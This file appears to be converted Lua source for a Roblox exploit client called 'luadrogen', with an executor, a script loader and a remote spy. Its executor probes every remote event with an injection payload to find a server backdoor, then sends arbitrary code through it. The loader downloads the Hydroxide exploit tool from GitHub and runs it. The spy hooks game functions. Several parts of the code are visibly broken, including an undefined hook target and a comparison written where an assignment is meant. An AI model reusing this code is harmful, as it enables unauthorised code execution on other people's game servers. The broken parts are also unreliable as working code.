Converted["_Open"].Position = UDim2.new(0.568232, 0, 0.0596513972, 0)
Converted["_Open"].Size = UDim2.new(0, 67, 0, 63)
Converted["_Open"].Name = "Open"
Converted["_Open"].Parent = Converted["_luadrogen"]

Converted["_UICorner13"].Parent = Converted["_Open"]

Converted["_UIStroke13"].ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Converted["_UIStroke13"].Color = Color3.fromRGB(1.0000000591389835, 1.0000000591389835, 128.0000075697899)
Converted["_UIStroke13"].Thickness = 1.5
Converted["_UIStroke13"].Parent = Converted["_Open"]

Converted["_ImageLabel3"].Image = "rbxassetid://131112153"
Converted["_ImageLabel3"].ImageContent = Content
Converted["_ImageLabel3"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageLabel3"].BackgroundTransparency = 1
Converted["_ImageLabel3"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_ImageLabel3"].BorderSizePixel = 0
Converted["_ImageLabel3"].Size = UDim2.new(0, 48, 0, 48)
Converted["_ImageLabel3"].Parent = Converted["_Open"]

-- Fake Module Scripts:

local fake_module_scripts = {}


-- Fake Local Scripts:

local function YZOS_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.CenterFrame
    local script = Instance.new("LocalScript")
    script.Name = "CenterFrame"
    script.Parent = Converted["_Frame"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Position = UDim2.new(0.5, -script.Parent.Size.X.Offset / 2, 0.5, -script.Parent.Size.Y.Offset / 2)
end
local function COKNNL_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.Minimize.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Minimize"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
		script.Parent.Parent.Parent.Open.Visible = true
	end)
end
local function IKIIR_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.OPS.Scripts.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		local main = script.Parent.Parent.Parent.Parent
		local list = { -- should be strings
			'Executor';
			'RSpy';
		}
		for _, v in ipairs(list) do
			main:WaitForChild(v).Visible = false
		end
		main:WaitForChild(script.Parent.Parent.Name).Visible = true
	end)
end
local function JXHJ_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.OPS.Executor.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton1"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		local main = script.Parent.Parent.Parent.Parent
		local list = { -- should be strings
			'Scripts';
			'RSpy';
		}
		for _, v in ipairs(list) do
			main:WaitForChild(v).Visible = false
		end
		main:WaitForChild(script.Parent.Parent.Name).Visible = true
	end)
end
local function JHTP_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.OPS.RSpy.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton2"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		local main = script.Parent.Parent.Parent.Parent
		local list = { -- should be strings
			'Scripts';
			'Executor';
		}
		for _, v in ipairs(list) do
			main:WaitForChild(v).Visible = false
		end
		main:WaitForChild(script.Parent.Parent.Name).Visible = true
	end)
end
local function ECFT_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.Scripts.TextButton.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_TextButton3"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		local URL = ''
		local httpGET = ( request or syn and syn.request or function(url:string) return game:HttpGet(url) end or function(url:string) if game:GetService('HttpService').HttpEnabled == true then return game:GetService('HttpService'):GetAsync(url) end end )
		local httpGETasync = function(code) return game:HttpGetAsync(code) or httpGET end
		local loadstring = ( loadstring or function(code) 
			return require(game:GetObjects('rbxassetid://4689019964'))(code)
		end)
		loadstring([[
	local owner = "Upbolt"
	local branch = "revision"
	
	local function webImport(file)
	    return loadstring(game:HttpGetAsync(("https://raw.githubusercontent.com/%s/Hydroxide/%s/%s.lua"):format(owner, branch, file)), file .. '.lua')()
	end
	
	webImport("init")
	webImport("ui/main")
		]])()
	end)
end
local function JJLW_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.Executor.Script.Box.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Box"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local highlighter = {}
	local keywords = {
		lua = {
			"and", "break", "or", "else", "elseif", "if", "then", "until", "repeat", "while", "do", "for", "in", "end",
			"local", "return", "function", "export"
		},
		rbx = {
			"game", "workspace", "script", "math", "string", "table", "task", "wait", "select", "next", "Enum",
			"error", "warn", "tick", "assert", "shared", "loadstring", "tonumber", "tostring", "type",
			"typeof", "unpack", "print", "Instance", "CFrame", "Vector3", "Vector2", "Color3", "UDim", "UDim2", "Ray", "BrickColor",
			"OverlapParams", "RaycastParams", "Axes", "Random", "Region3", "Rect", "TweenInfo",
			"collectgarbage", "not", "utf8", "pcall", "xpcall", "_G", "setmetatable", "getmetatable", "os", "pairs", "ipairs"
		},
		operators = {
			"#", "+", "-", "*", "%", "/", "^", "=", "~", "=", "<", ">", ",", ".", "(", ")", "{", "}", "[", "]", ";", ":"
		}
	}
	
	local colors = {
		numbers = Color3.fromRGB(255, 198, 0),
		boolean = Color3.fromRGB(214, 128, 23),
		operator = Color3.fromRGB(232, 210, 40),
		lua = Color3.fromRGB(160, 87, 248),
		rbx = Color3.fromRGB(146, 180, 253),
		str = Color3.fromRGB(56, 241, 87),
		comment = Color3.fromRGB(103, 110, 149),
		null = Color3.fromRGB(79, 79, 79),
		call = Color3.fromRGB(130, 170, 255),
		self_call = Color3.fromRGB(227, 201, 141),
		local_color = Color3.fromRGB(199, 146, 234),
		function_color = Color3.fromRGB(241, 122, 124),
		self_color = Color3.fromRGB(146, 134, 234),
		local_property = Color3.fromRGB(129, 222, 255),
	}
	
	local function createKeywordSet(keywords)
		local keywordSet = {}
		for _, keyword in ipairs(keywords) do
			keywordSet[keyword] = true
		end
		return keywordSet
	end
	
	local luaSet = createKeywordSet(keywords.lua)
	local rbxSet = createKeywordSet(keywords.rbx)
	local operatorsSet = createKeywordSet(keywords.operators)
	
	local function getHighlight(tokens, index)
		local token = tokens[index]
	
		if colors[token .. "_color"] then
			return colors[token .. "_color"]
		end
	
		if tonumber(token) then
			return colors.numbers
		elseif token == "nil" then
			return colors.null
		elseif token:sub(1, 2) == "--" then
			return colors.comment
		elseif operatorsSet[token] then
			return colors.operator
		elseif luaSet[token] then
			return colors.rbx
		elseif rbxSet[token] then
			return colors.lua
		elseif token:sub(1, 1) == "\"" or token:sub(1, 1) == "\'" then
			return colors.str
		elseif token == "true" or token == "false" then
			return colors.boolean
		end
	
		if tokens[index + 1] == "(" then
			if tokens[index - 1] == ":" then
				return colors.self_call
			end
	
			return colors.call
		end
	
		if tokens[index - 1] == "." then
			if tokens[index - 2] == "Enum" then
				return colors.rbx
			end
	
			return colors.local_property
		end
	end
	
	function highlighter.run(source)
		local tokens = {}
		local currentToken = ""
	
		local inString = false
		local inComment = false
		local commentPersist = false
	
		for i = 1, #source do
			local character = source:sub(i, i)
	
			if inComment then
				if character == "\n" and not commentPersist then
					table.insert(tokens, currentToken)
					table.insert(tokens, character)
					currentToken = ""
	
					inComment = false
				elseif source:sub(i - 1, i) == "]]" and commentPersist then
					currentToken ..= "]"
	
					table.insert(tokens, currentToken)
					currentToken = ""
	
					inComment = false
					commentPersist = false
				else
					currentToken = currentToken .. character
				end
			elseif inString then
				if character == inString and source:sub(i-1, i-1) ~= "\\" or character == "\n" then
					currentToken = currentToken .. character
					inString = false
				else
					currentToken = currentToken .. character
				end
			else
				if source:sub(i, i + 1) == "--" then
					table.insert(tokens, currentToken)
					currentToken = "-"
					inComment = true
					commentPersist = source:sub(i + 2, i + 3) == "[["
				elseif character == "\"" or character == "\'" then
					table.insert(tokens, currentToken)
					currentToken = character
					inString = character
				elseif operatorsSet[character] then
					table.insert(tokens, currentToken)
					table.insert(tokens, character)
					currentToken = ""
				elseif character:match("[%w_]") then
					currentToken = currentToken .. character
				else
					table.insert(tokens, currentToken)
					table.insert(tokens, character)
					currentToken = ""
				end
			end
		end
	
		table.insert(tokens, currentToken)
	
		local highlighted = {}
	
		for i, token in ipairs(tokens) do
			local highlight = getHighlight(tokens, i)
	
			if highlight then
				local syntax = string.format("<font color = \"#%s\">%s</font>", highlight:ToHex(), token:gsub("<", "&lt;"):gsub(">", "&gt;"))
	
				table.insert(highlighted, syntax)
			else
				table.insert(highlighted, token)
			end
		end
	
		return table.concat(highlighted)
	end
	
	script.Parent:GetPropertyChangedSignal('Text'):Connect(function()
		script.Parent:WaitForChild('TextLabel').Text = highlighter.run(script.Parent.Text)
	end)
end
local function OMRZ_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.Executor.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Executor1"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local backdoor
	local server = false
	
	local SOC = script.Parent.SoC
	local inj = script.Parent.inj
	local exe = script.Parent.exe
	local cls = script.Parent.cls
	
	local box = script.Parent.Script.Box
	
	SOC.MouseButton1Click:Connect(function()
		if server == false then
			server = true
			SOC.Text = 'GOTO cilent'
			inj.Visible = true
		else
			server = false
			SOC.Text = 'GOTO server'
			inj.Visible = false
		end
	end)
	
	inj.MouseButton1Click:Connect(function()
		local OBJs = {}
		for _, v in pairs(game:GetService('ReplicatedStorage'):GetDescendants()) do
			if v:IsA('RemoteEvent') or v:IsA('RemoteFunction') then
				table.insert(OBJs, v)
			end
		end
		for _, v in pairs(game:GetService('Workspace'):GetDescendants()) do
			if v:IsA('RemoteEvent') or v:IsA('RemoteFunction') then
				table.insert(OBJs, v)
			end
		end
		for _, v in pairs(game:GetService('Lighting'):GetDescendants()) do
			if v:IsA('RemoteEvent') or v:IsA('RemoteFunction') then
				table.insert(OBJs, v)
			end
		end
		for _, a in ipairs(OBJs) do
			if a:IsA('RemoteEvent') then
				a:FireServer('local obj = Instance.new("Part"); obj.Parent == workspace; obj.Name = "SUPERsigmaOHIOrizzler"')
				if workspace:WaitForChild('SUPERsigmaOHIOrizzler', 2) then
					a:FireServer('workspace.SUPERsigmaOHIOrizzler:Destroy()')
					backdoor = a
					break
				end
			elseif a:IsA('RemoteFunction') then
				a:InvokeServer('local obj = Instance.new("Part"); obj.Parent == workspace; obj.Name = "SUPERsigmaOHIOrizzler"')
				if workspace:WaitForChild('SUPERsigmaOHIOrizzler', 2) then
					a:InvokeServer('workspace.SUPERsigmaOHIOrizzler:Destroy()')
					backdoor = a
					break
				end
			end
		end
	end)
	
	cls.MouseButton1Click:Connect(function()
		box.Text = ''
	end)
	
	exe.MouseButton1Click:Connect(function()
		if backdoor then
			backdoor:FireServer(box.Text)
		else
			loadstring(box.Text)()
		end
	end)
end
local function LCZI_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Frame"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
local function EAPI_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.RSpy.Script.Box.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Box1"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local highlighter = {}
	local keywords = {
		lua = {
			"and", "break", "or", "else", "elseif", "if", "then", "until", "repeat", "while", "do", "for", "in", "end",
			"local", "return", "function", "export"
		},
		rbx = {
			"game", "workspace", "script", "math", "string", "table", "task", "wait", "select", "next", "Enum",
			"error", "warn", "tick", "assert", "shared", "loadstring", "tonumber", "tostring", "type",
			"typeof", "unpack", "print", "Instance", "CFrame", "Vector3", "Vector2", "Color3", "UDim", "UDim2", "Ray", "BrickColor",
			"OverlapParams", "RaycastParams", "Axes", "Random", "Region3", "Rect", "TweenInfo",
			"collectgarbage", "not", "utf8", "pcall", "xpcall", "_G", "setmetatable", "getmetatable", "os", "pairs", "ipairs"
		},
		operators = {
			"#", "+", "-", "*", "%", "/", "^", "=", "~", "=", "<", ">", ",", ".", "(", ")", "{", "}", "[", "]", ";", ":"
		}
	}
	
	local colors = {
		numbers = Color3.fromRGB(255, 198, 0),
		boolean = Color3.fromRGB(214, 128, 23),
		operator = Color3.fromRGB(232, 210, 40),
		lua = Color3.fromRGB(160, 87, 248),
		rbx = Color3.fromRGB(146, 180, 253),
		str = Color3.fromRGB(56, 241, 87),
		comment = Color3.fromRGB(103, 110, 149),
		null = Color3.fromRGB(79, 79, 79),
		call = Color3.fromRGB(130, 170, 255),
		self_call = Color3.fromRGB(227, 201, 141),
		local_color = Color3.fromRGB(199, 146, 234),
		function_color = Color3.fromRGB(241, 122, 124),
		self_color = Color3.fromRGB(146, 134, 234),
		local_property = Color3.fromRGB(129, 222, 255),
	}
	
	local function createKeywordSet(keywords)
		local keywordSet = {}
		for _, keyword in ipairs(keywords) do
			keywordSet[keyword] = true
		end
		return keywordSet
	end
	
	local luaSet = createKeywordSet(keywords.lua)
	local rbxSet = createKeywordSet(keywords.rbx)
	local operatorsSet = createKeywordSet(keywords.operators)
	
	local function getHighlight(tokens, index)
		local token = tokens[index]
	
		if colors[token .. "_color"] then
			return colors[token .. "_color"]
		end
	
		if tonumber(token) then
			return colors.numbers
		elseif token == "nil" then
			return colors.null
		elseif token:sub(1, 2) == "--" then
			return colors.comment
		elseif operatorsSet[token] then
			return colors.operator
		elseif luaSet[token] then
			return colors.rbx
		elseif rbxSet[token] then
			return colors.lua
		elseif token:sub(1, 1) == "\"" or token:sub(1, 1) == "\'" then
			return colors.str
		elseif token == "true" or token == "false" then
			return colors.boolean
		end
	
		if tokens[index + 1] == "(" then
			if tokens[index - 1] == ":" then
				return colors.self_call
			end
	
			return colors.call
		end
	
		if tokens[index - 1] == "." then
			if tokens[index - 2] == "Enum" then
				return colors.rbx
			end
	
			return colors.local_property
		end
	end
	
	function highlighter.run(source)
		local tokens = {}
		local currentToken = ""
	
		local inString = false
		local inComment = false
		local commentPersist = false
	
		for i = 1, #source do
			local character = source:sub(i, i)
	
			if inComment then
				if character == "\n" and not commentPersist then
					table.insert(tokens, currentToken)
					table.insert(tokens, character)
					currentToken = ""
	
					inComment = false
				elseif source:sub(i - 1, i) == "]]" and commentPersist then
					currentToken ..= "]"
	
					table.insert(tokens, currentToken)
					currentToken = ""
	
					inComment = false
					commentPersist = false
				else
					currentToken = currentToken .. character
				end
			elseif inString then
				if character == inString and source:sub(i-1, i-1) ~= "\\" or character == "\n" then
					currentToken = currentToken .. character
					inString = false
				else
					currentToken = currentToken .. character
				end
			else
				if source:sub(i, i + 1) == "--" then
					table.insert(tokens, currentToken)
					currentToken = "-"
					inComment = true
					commentPersist = source:sub(i + 2, i + 3) == "[["
				elseif character == "\"" or character == "\'" then
					table.insert(tokens, currentToken)
					currentToken = character
					inString = character
				elseif operatorsSet[character] then
					table.insert(tokens, currentToken)
					table.insert(tokens, character)
					currentToken = ""
				elseif character:match("[%w_]") then
					currentToken = currentToken .. character
				else
					table.insert(tokens, currentToken)
					table.insert(tokens, character)
					currentToken = ""
				end
			end
		end
	
		table.insert(tokens, currentToken)
	
		local highlighted = {}
	
		for i, token in ipairs(tokens) do
			local highlight = getHighlight(tokens, i)
	
			if highlight then
				local syntax = string.format("<font color = \"#%s\">%s</font>", highlight:ToHex(), token:gsub("<", "&lt;"):gsub(">", "&gt;"))
	
				table.insert(highlighted, syntax)
			else
				table.insert(highlighted, token)
			end
		end
	
		return table.concat(highlighted)
	end
	
	script.Parent:GetPropertyChangedSignal('Text'):Connect(function()
		script.Parent:WaitForChild('TextLabel').Text = highlighter.run(script.Parent.Text)
	end)
end
local function JWBS_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.RSpy.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_RSpy1"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	for _, v in ipairs(getinstances()) do
		if v:IsA('RemoteEvent') then
			if v.FireClient then
				hookfunction(orig, function(...)
					local args = ...
					local clone = script:WaitForChild('Event'):Clone()
					clone.TextLabel.Text = v.Name
					clone.Parent = script.Parent:WaitForChild('Remotes')
					clone.ShowCode.MouseButton1Click:Connect(function()
						script.Parent:WaitForChild('Script'):WaitForChild('Box').Text = string.format([[local args = %s
						%s:Fire%s(unpack(args))]], args, getcallingscript():GetFullName(), 'Client')
				end)
			end)
			
			if v.FireAllClient then
				hookfunction(orig, function(...)
					local args = ...
					local clone = script:WaitForChild('Event'):Clone()
					clone.TextLabel.Text = v.Name
					clone.Parent = script.Parent:WaitForChild('Remotes')
					clone.ShowCode.MouseButton1Click:Connect(function()
						script.Parent:WaitForChild('Script'):WaitForChild('Box').Text = string.format([[local args = %s
					%s:Fire%s(unpack(args))]], args, getcallingscript():GetFullName(), 'AllClient')
					end)
				end)	
			end
				
			if v.FireServer then
				hookfunction(orig, function(...)
					local args = ...
					local clone = script:WaitForChild('Event'):Clone()
					clone.TextLabel.Text = v.Name
					clone.Parent = script.Parent:WaitForChild('Remotes')
					clone.ShowCode.MouseButton1Click:Connect(function()
						script.Parent:WaitForChild('Script'):WaitForChild('Box').Text = string.format([[local args = %s
				%s:Fire%s(unpack(args))]], args, getcallingscript():GetFullName(), 'Server')
					end)
				end)	
			end
	
			end
		end
	end
end
local function DOEZS_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.RSpy.cc.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_cc"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		setclipboard(script.Parent.Parent:WaitForChild('Script'):WaitForChild('Box').Text)
	end)
end
local function LSUFH_fake_script() -- Fake Script: StarterGui.luadrogen.Frame.RSpy.rc.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_rc"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(script.Parent.Parent:WaitForChild('Script'):WaitForChild('Box').Text)()
	end)
end
local function ZLAVEST_fake_script() -- Fake Script: StarterGui.luadrogen.Open.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Open"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Frame.Visible = true
		script.Parent.Visible = false
	end)
end
local function UUQZP_fake_script() -- Fake Script: StarterGui.luadrogen.Open.LocalScript
    local script = Instance.new("LocalScript")
    script.Name = "LocalScript"
    script.Parent = Converted["_Open"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
local function PRCBEE_fake_script() -- Fake Script: StarterGui.luadrogen.Open.CenterFrame
    local script = Instance.new("LocalScript")
    script.Name = "CenterFrame"
    script.Parent = Converted["_Open"]
    local req = require
    local require = function(obj)
        local fake = fake_module_scripts[obj]
        if fake then
            return fake()
        end
        return req(obj)
    end

	script.Parent.Position = UDim2.new(0.5, -script.Parent.Size.X.Offset / 2, 0.5, -script.Parent.Size.Y.Offset / 2)
end

coroutine.wrap(YZOS_fake_script)()
coroutine.wrap(COKNNL_fake_script)()
coroutine.wrap(IKIIR_fake_script)()
coroutine.wrap(JXHJ_fake_script)()
coroutine.wrap(JHTP_fake_script)()
coroutine.wrap(ECFT_fake_script)()
coroutine.wrap(JJLW_fake_script)()
coroutine.wrap(OMRZ_fake_script)()
coroutine.wrap(LCZI_fake_script)()
coroutine.wrap(EAPI_fake_script)()
coroutine.wrap(JWBS_fake_script)()
coroutine.wrap(DOEZS_fake_script)()
coroutine.wrap(LSUFH_fake_script)()
coroutine.wrap(ZLAVEST_fake_script)()
coroutine.wrap(UUQZP_fake_script)()
coroutine.wrap(PRCBEE_fake_script)()
